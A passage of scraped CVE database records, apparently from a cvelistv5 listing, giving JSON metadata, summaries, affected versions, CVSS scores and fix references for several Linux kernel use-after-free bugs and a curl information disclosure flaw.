"n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel before 6.4.5, drivers/gpu/drm/drm_atomic.c has a use-after-free during a race condition between a nonblocking atomic commit and a driver unload." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-23T10:10:40.556809", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/4e076c73e4f6e90816b30fcd4a0d7ab365087255" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.4.5" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-51043", "datePublished": "2024-01-23T00:00:00", "dateReserved": "2023-12-18T00:00:00", "dateUpdated": "2024-08-29T14:28:09.022Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-26582
Vulnerability from cvelistv5
Published
2024-02-21 14:59
Modified
2024-12-19 08:42
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: tls: fix use-after-free with partial reads and async decrypt
tls_decrypt_sg doesn't take a reference on the pages from clear_skb,
so the put_page() in tls_decrypt_done releases them, and we trigger
a use-after-free in process_rx_list when we try to read from the
partially-read skb.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T00:07:19.870Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/20b4ed034872b4d024b26e2bc1092c3f80e5db96" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/d684763534b969cca1022e2a28645c7cc91f7fa5" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/754c9bab77a1b895b97bd99d754403c505bc79df" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/32b55c5ff9103b8508c1e04bfa5a08c64e7a925f" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2024-26582", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-08-08T19:39:21.408800Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-08T19:39:35.386Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "net/tls/tls_sw.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "20b4ed034872b4d024b26e2bc1092c3f80e5db96", "status": "affected", "version": "fd31f3996af2627106e22a9f8072764fede51161", "versionType": "git" }, { "lessThan": "d684763534b969cca1022e2a28645c7cc91f7fa5", "status": "affected", "version": "fd31f3996af2627106e22a9f8072764fede51161", "versionType": "git" }, { "lessThan": "754c9bab77a1b895b97bd99d754403c505bc79df", "status": "affected", "version": "fd31f3996af2627106e22a9f8072764fede51161", "versionType": "git" }, { "lessThan": "32b55c5ff9103b8508c1e04bfa5a08c64e7a925f", "status": "affected", "version": "fd31f3996af2627106e22a9f8072764fede51161", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "net/tls/tls_sw.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "6.0" }, { "lessThan": "6.0", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.79", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.18", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.6", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: tls: fix use-after-free with partial reads and async decrypt\n\ntls_decrypt_sg doesn\u0027t take a reference on the pages from clear_skb,\nso the put_page() in tls_decrypt_done releases them, and we trigger\na use-after-free in process_rx_list when we try to read from the\npartially-read skb." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:42:55.355Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/20b4ed034872b4d024b26e2bc1092c3f80e5db96" }, { "url": "https://git.kernel.org/stable/c/d684763534b969cca1022e2a28645c7cc91f7fa5" }, { "url": "https://git.kernel.org/stable/c/754c9bab77a1b895b97bd99d754403c505bc79df" }, { "url": "https://git.kernel.org/stable/c/32b55c5ff9103b8508c1e04bfa5a08c64e7a925f" } ], "title": "net: tls: fix use-after-free with partial reads and async decrypt", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2024-26582", "datePublished": "2024-02-21T14:59:11.229Z", "dateReserved": "2024-02-19T14:20:24.125Z", "dateUpdated": "2024-12-19T08:42:55.355Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6932
Vulnerability from cvelistv5
Published
2023-12-19 14:09
Modified
2024-08-02 08:42
Severity ?
EPSS score ?
Summary
A use-after-free vulnerability in the Linux kernel's ipv4: igmp component can be exploited to achieve local privilege escalation.
A race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread.
We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:42:08.680Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=e2b706c691905fe78468c361aaabc719d0a496f1" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/e2b706c691905fe78468c361aaabc719d0a496f1" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.7", "status": "affected", "version": "2.6.12", "versionType": "custom" } ] } ], "datePublic": "2023-11-24T15:25:56+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s ipv4: igmp component can be exploited to achieve local privilege escalation.\n\nA race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread.\n\nWe recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-19T14:09:15.662Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=e2b706c691905fe78468c361aaabc719d0a496f1" }, { "url": "https://kernel.dance/e2b706c691905fe78468c361aaabc719d0a496f1" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" }, { "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s ipv4: igmp component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-6932", "datePublished": "2023-12-19T14:09:15.662Z", "dateReserved": "2023-12-18T20:14:26.281Z", "dateUpdated": "2024-08-02T08:42:08.680Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-28322
Vulnerability from cvelistv5
Published
2023-05-26 00:00
Modified
2024-08-02 12:38
Severity ?
EPSS score ?
Summary
An information disclosure vulnerability exists in curl <v8.1.0 when doing HTTP(S) transfers, libcurl might erroneously use the read callback (`CURLOPT_READFUNCTION`) to ask for data to send, even when the `CURLOPT_POSTFIELDS` option has been set, if the same handle previously wasused to issue a `PUT` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the second transfer. The problem exists in the logic for a reused handle when it is (expected to be) changed from a PUT to a POST.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | https://github.com/curl/curl |
Version: Fixed in 8.1.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T12:38:25.091Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://hackerone.com/reports/1954658" }, { "name": "FEDORA-2023-37eac50e9b", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F4I75RDGX5ULSSCBE5BF3P5I5SFO7ULQ/" }, { "name": "FEDORA-2023-8ed627bb04", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LIWHWKOVH24COGGBCVOWDXXIUPKOMK/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230609-0009/" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT213843" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT213844" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT213845" }, { "name": "20230725 APPLE-SA-2023-07-24-6 macOS Big Sur 11.7.9", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/52" }, { "name": "20230725 APPLE-SA-2023-07-24-5 macOS Monterey 12.6.8", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/48" }, { "name": "20230725 APPLE-SA-2023-07-24-4 macOS Ventura 13.5", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/47" }, { "name": "GLSA-202310-12", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202310-12" }, { "name": "[debian-lts-announce] 20231222 [SECURITY] [DLA 3692-1] curl security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00015.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "https://github.com/curl/curl", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in 8.1.0" } ] } ], "descriptions": [ { "lang": "en", "value": "An information disclosure vulnerability exists in curl \u003cv8.1.0 when doing HTTP(S) transfers, libcurl might erroneously use the read callback (`CURLOPT_READFUNCTION`) to ask for data to send, even when the `CURLOPT_POSTFIELDS` option has been set, if the same handle previously wasused to issue a `PUT` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the second transfer. The problem exists in the logic for a reused handle when it is (expected to be) changed from a PUT to a POST." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-200", "description": "Information Disclosure (CWE-200)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-22T16:06:14.746366", "orgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "shortName": "hackerone" }, "references": [ { "url": "https://hackerone.com/reports/1954658" }, { "name": "FEDORA-2023-37eac50e9b", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F4I75RDGX5ULSSCBE5BF3P5I5SFO7ULQ/" }, { "name": "FEDORA-2023-8ed627bb04", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LIWHWKOVH24COGGBCVOWDXXIUPKOMK/" }, { "url": "https://security.netapp.com/advisory/ntap-20230609-0009/" }, { "url": "https://support.apple.com/kb/HT213843" }, { "url": "https://support.apple.com/kb/HT213844" }, { "url": "https://support.apple.com/kb/HT213845" }, { "name": "20230725 APPLE-SA-2023-07-24-6 macOS Big Sur 11.7.9", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/52" }, { "name": "20230725 APPLE-SA-2023-07-24-5 macOS Monterey 12.6.8", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/48" }, { "name": "20230725 APPLE-SA-2023-07-24-4 macOS Ventura 13.5", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/47" }, { "name": "GLSA-202310-12", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202310-12" }, { "name": "[debian-lts-announce] 20231222 [SECURITY] [DLA 3692-1] curl security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00015.html" } ] } }, "cveMetadata": { "assignerOrgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "assignerShortName": "hackerone", "cveId": "CVE-2023-28322", "datePublished": "2023-05-26T00:00:00", "dateReserved": "2023-03-14T00:00:00", "dateUpdated": "2024-08-02T12:38:25.091Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52610
Vulnerability from cvelistv5
Published
2024-03-18 10:07
Modified
2024-12-19 08:22
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_ct: fix skb leak and crash on ooo frags
act_ct adds skb->users before defragmentation. If frags arrive in order,
the last frag's reference is reset in:
inet_frag_reasm_prepare
skb_morph
which is not straightforward.
However when frags arrive out of order, nobody unref the last frag, and
all frags are leaked. The situation is even worse, as initiating packet
capture can lead to a crash[0] when skb has been cloned and shared at the
same time.
Fix the issue by removing skb_get() before defragmentation. act_ct
returns TC_ACT_CONSUMED when defrag failed or in progress.
[0]:
[ 843.804823] ------------[ cut here ]------------
[ 843.809659] kernel BUG at net/core/skbuff.c:2091!
[ 843.814516] invalid opcode: 0000 [#1] PREEMPT SMP
[ 843.819296] CPU: 7 PID: 0 Comm: swapper/7 Kdump: loaded Tainted: G S 6.7.0-rc3 #2
[ 843.824107] Hardware name: XFUSION 1288H V6/BC13MBSBD, BIOS 1.29 11/25/2022
[ 843.828953] RIP: 0010:pskb_expand_head+0x2ac/0x300
[ 843.833805] Code: 8b 70 28 48 85 f6 74 82 48 83 c6 08 bf 01 00 00 00 e8 38 bd ff ff 8b 83 c0 00 00 00 48 03 83 c8 00 00 00 e9 62 ff ff ff 0f 0b <0f> 0b e8 8d d0 ff ff e9 b3 fd ff ff 81 7c 24 14 40 01 00 00 4c 89
[ 843.843698] RSP: 0018:ffffc9000cce07c0 EFLAGS: 00010202
[ 843.848524] RAX: 0000000000000002 RBX: ffff88811a211d00 RCX: 0000000000000820
[ 843.853299] RDX: 0000000000000640 RSI: 0000000000000000 RDI: ffff88811a211d00
[ 843.857974] RBP: ffff888127d39518 R08: 00000000bee97314 R09: 0000000000000000
[ 843.862584] R10: 0000000000000000 R11: ffff8881109f0000 R12: 0000000000000880
[ 843.867147] R13: ffff888127d39580 R14: 0000000000000640 R15: ffff888170f7b900
[ 843.871680] FS: 0000000000000000(0000) GS:ffff889ffffc0000(0000) knlGS:0000000000000000
[ 843.876242] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 843.880778] CR2: 00007fa42affcfb8 CR3: 000000011433a002 CR4: 0000000000770ef0
[ 843.885336] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 843.889809] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 843.894229] PKRU: 55555554
[ 843.898539] Call Trace:
[ 843.902772] <IRQ>
[ 843.906922] ? __die_body+0x1e/0x60
[ 843.911032] ? die+0x3c/0x60
[ 843.915037] ? do_trap+0xe2/0x110
[ 843.918911] ? pskb_expand_head+0x2ac/0x300
[ 843.922687] ? do_error_trap+0x65/0x80
[ 843.926342] ? pskb_expand_head+0x2ac/0x300
[ 843.929905] ? exc_invalid_op+0x50/0x60
[ 843.933398] ? pskb_expand_head+0x2ac/0x300
[ 843.936835] ? asm_exc_invalid_op+0x1a/0x20
[ 843.940226] ? pskb_expand_head+0x2ac/0x300
[ 843.943580] inet_frag_reasm_prepare+0xd1/0x240
[ 843.946904] ip_defrag+0x5d4/0x870
[ 843.950132] nf_ct_handle_fragments+0xec/0x130 [nf_conntrack]
[ 843.953334] tcf_ct_act+0x252/0xd90 [act_ct]
[ 843.956473] ? tcf_mirred_act+0x516/0x5a0 [act_mirred]
[ 843.959657] tcf_action_exec+0xa1/0x160
[ 843.962823] fl_classify+0x1db/0x1f0 [cls_flower]
[ 843.966010] ? skb_clone+0x53/0xc0
[ 843.969173] tcf_classify+0x24d/0x420
[ 843.972333] tc_run+0x8f/0xf0
[ 843.975465] __netif_receive_skb_core+0x67a/0x1080
[ 843.978634] ? dev_gro_receive+0x249/0x730
[ 843.981759] __netif_receive_skb_list_core+0x12d/0x260
[ 843.984869] netif_receive_skb_list_internal+0x1cb/0x2f0
[ 843.987957] ? mlx5e_handle_rx_cqe_mpwrq_rep+0xfa/0x1a0 [mlx5_core]
[ 843.991170] napi_complete_done+0x72/0x1a0
[ 843.994305] mlx5e_napi_poll+0x28c/0x6d0 [mlx5_core]
[ 843.997501] __napi_poll+0x25/0x1b0
[ 844.000627] net_rx_action+0x256/0x330
[ 844.003705] __do_softirq+0xb3/0x29b
[ 844.006718] irq_exit_rcu+0x9e/0xc0
[ 844.009672] common_interrupt+0x86/0xa0
[ 844.012537] </IRQ>
[ 844.015285] <TASK>
[ 844.017937] asm_common_interrupt+0x26/0x40
[ 844.020591] RIP: 0010:acpi_safe_halt+0x1b/0x20
[ 844.023247] Code: ff 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 65 48 8b 04 25 00 18 03 00 48 8b 00 a8 08 75 0c 66 90 0f 00 2d 81 d0 44 00 fb
---truncated---
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: b57dc7c13ea90e09ae15f821d2583fa0231b4935 Version: b57dc7c13ea90e09ae15f821d2583fa0231b4935 Version: b57dc7c13ea90e09ae15f821d2583fa0231b4935 Version: b57dc7c13ea90e09ae15f821d2583fa0231b4935 Version: b57dc7c13ea90e09ae15f821d2583fa0231b4935 |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-52610", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-06-21T16:09:12.830591Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-21T16:09:22.568Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T23:03:21.154Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/172ba7d46c202e679f3ccb10264c67416aaeb1c4" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/0b5b831122fc3789fff75be433ba3e4dd7b779d4" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/73f7da5fd124f2cda9161e2e46114915e6e82e97" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/f5346df0591d10bc948761ca854b1fae6d2ef441" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/3f14b377d01d8357eba032b4cabc8c1149b458b6" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "net/sched/act_ct.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "172ba7d46c202e679f3ccb10264c67416aaeb1c4", "status": "affected", "version": "b57dc7c13ea90e09ae15f821d2583fa0231b4935", "versionType": "git" }, { "lessThan": "0b5b831122fc3789fff75be433ba3e4dd7b779d4", "status": "affected", "version": "b57dc7c13ea90e09ae15f821d2583fa0231b4935", "versionType": "git" }, { "lessThan": "73f7da5fd124f2cda9161e2e46114915e6e82e97", "status": "affected", "version": "b57dc7c13ea90e09ae15f821d2583fa0231b4935", "versionType": "git" }, { "lessThan": "f5346df0591d10bc948761ca854b1fae6d2ef441", "status": "affected", "version": "b57dc7c13ea90e09ae15f821d2583fa0231b4935", "versionType": "git" }, { "lessThan": "3f14b377d01d8357eba032b4cabc8c1149b458b6", "status": "affected", "version": "b57dc7c13ea90e09ae15f821d2583fa0231b4935", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "net/sched/act_ct.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "5.3" }, { "lessThan": "5.3", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.148", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.75", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.14", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.2", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: act_ct: fix skb leak and crash on ooo frags\n\nact_ct adds skb-\u003eusers before defragmentation. If frags arrive in order,\nthe last frag\u0027s reference is reset in:\n\n inet_frag_reasm_prepare\n skb_morph\n\nwhich is not straightforward.\n\nHowever when frags arrive out of order, nobody unref the last frag, and\nall frags are leaked. The situation is even worse, as initiating packet\ncapture can lead to a crash[0] when skb has been cloned and shared at the\nsame time.\n\nFix the issue by removing skb_get() before defragmentation. act_ct\nreturns TC_ACT_CONSUMED when defrag failed or in progress.\n\n[0]:\n[ 843.804823] ------------[ cut here ]------------\n[ 843.809659] kernel BUG at net/core/skbuff.c:2091!\n[ 843.814516] invalid opcode: 0000 [#1] PREEMPT SMP\n[ 843.819296] CPU: 7 PID: 0 Comm: swapper/7 Kdump: loaded Tainted: G S 6.7.0-rc3 #2\n[ 843.824107] Hardware name: XFUSION 1288H V6/BC13MBSBD, BIOS 1.29 11/25/2022\n[ 843.828953] RIP: 0010:pskb_expand_head+0x2ac/0x300\n[ 843.833805] Code: 8b 70 28 48 85 f6 74 82 48 83 c6 08 bf 01 00 00 00 e8 38 bd ff ff 8b 83 c0 00 00 00 48 03 83 c8 00 00 00 e9 62 ff ff ff 0f 0b \u003c0f\u003e 0b e8 8d d0 ff ff e9 b3 fd ff ff 81 7c 24 14 40 01 00 00 4c 89\n[ 843.843698] RSP: 0018:ffffc9000cce07c0 EFLAGS: 00010202\n[ 843.848524] RAX: 0000000000000002 RBX: ffff88811a211d00 RCX: 0000000000000820\n[ 843.853299] RDX: 0000000000000640 RSI: 0000000000000000 RDI: ffff88811a211d00\n[ 843.857974] RBP: ffff888127d39518 R08: 00000000bee97314 R09: 0000000000000000\n[ 843.862584] R10: 0000000000000000 R11: ffff8881109f0000 R12: 0000000000000880\n[ 843.867147] R13: ffff888127d39580 R14: 0000000000000640 R15: ffff888170f7b900\n[ 843.871680] FS: 0000000000000000(0000) GS:ffff889ffffc0000(0000) knlGS:0000000000000000\n[ 843.876242] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 843.880778] CR2: 00007fa42affcfb8 CR3: 000000011433a002 CR4: 0000000000770ef0\n[ 843.885336] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 843.889809] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 843.894229] PKRU: 55555554\n[ 843.898539] Call Trace:\n[ 843.902772] \u003cIRQ\u003e\n[ 843.906922] ? __die_body+0x1e/0x60\n[ 843.911032] ? die+0x3c/0x60\n[ 843.915037] ? do_trap+0xe2/0x110\n[ 843.918911] ? pskb_expand_head+0x2ac/0x300\n[ 843.922687] ? do_error_trap+0x65/0x80\n[ 843.926342] ? pskb_expand_head+0x2ac/0x300\n[ 843.929905] ? exc_invalid_op+0x50/0x60\n[ 843.933398] ? pskb_expand_head+0x2ac/0x300\n[ 843.936835] ? asm_exc_invalid_op+0x1a/0x20\n[ 843.940226] ? pskb_expand_head+0x2ac/0x300\n[ 843.943580] inet_frag_reasm_prepare+0xd1/0x240\n[ 843.946904] ip_defrag+0x5d4/0x870\n[ 843.950132] nf_ct_handle_fragments+0xec/0x130 [nf_conntrack]\n[ 843.953334] tcf_ct_act+0x252/0xd90 [act_ct]\n[ 843.956473] ? tcf_mirred_act+0x516/0x5a0 [act_mirred]\n[ 843.959657] tcf_action_exec+0xa1/0x160\n[ 843.962823] fl_classify+0x1db/0x1f0 [cls_flower]\n[ 843.966010] ? skb_clone+0x53/0xc0\n[ 843.969173] tcf_classify+0x24d/0x420\n[ 843.972333] tc_run+0x8f/0xf0\n[ 843.975465] __netif_receive_skb_core+0x67a/0x1080\n[ 843.978634] ? dev_gro_receive+0x249/0x730\n[ 843.981759] __netif_receive_skb_list_core+0x12d/0x260\n[ 843.984869] netif_receive_skb_list_internal+0x1cb/0x2f0\n[ 843.987957] ? mlx5e_handle_rx_cqe_mpwrq_rep+0xfa/0x1a0 [mlx5_core]\n[ 843.991170] napi_complete_done+0x72/0x1a0\n[ 843.994305] mlx5e_napi_poll+0x28c/0x6d0 [mlx5_core]\n[ 843.997501] __napi_poll+0x25/0x1b0\n[ 844.000627] net_rx_action+0x256/0x330\n[ 844.003705] __do_softirq+0xb3/0x29b\n[ 844.006718] irq_exit_rcu+0x9e/0xc0\n[ 844.009672] common_interrupt+0x86/0xa0\n[ 844.012537] \u003c/IRQ\u003e\n[ 844.015285] \u003cTASK\u003e\n[ 844.017937] asm_common_interrupt+0x26/0x40\n[ 844.020591] RIP: 0010:acpi_safe_halt+0x1b/0x20\n[ 844.023247] Code: ff 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 65 48 8b 04 25 00 18 03 00 48 8b 00 a8 08 75 0c 66 90 0f 00 2d 81 d0 44 00 fb\n---truncated---" } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:22:33.819Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/172ba7d46c202e679f3ccb10264c67416aaeb1c4" }, { "url": "https://git.kernel.org/stable/c/0b5b831122fc3789fff75be433ba3e4dd7b779d4" }, { "url": "https://git.kernel.org/stable/c/73f7da5fd124f2cda9161e2e46114915e6e82e97" }, { "url": "https://git.kernel.org/stable/c/f5346df0591d10bc948761ca854b1fae6d2ef441" }, { "url": "https://git.kernel.org/stable/c/3f14b377d01d8357eba032b4cabc8c1149b458b6" } ], "title": "net/sched: act_ct: fix skb leak and crash on ooo frags", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52610", "datePublished": "2024-03-18T10:07:46.065Z", "dateReserved": "2024-03-06T09:52:12.088Z", "dateUpdated": "2024-12-19T08:22:33.819Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-26593
Vulnerability from cvelistv5
Published
2024-02-23 09:09
Modified
2024-12-19 08:43
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
i2c: i801: Fix block process call transactions
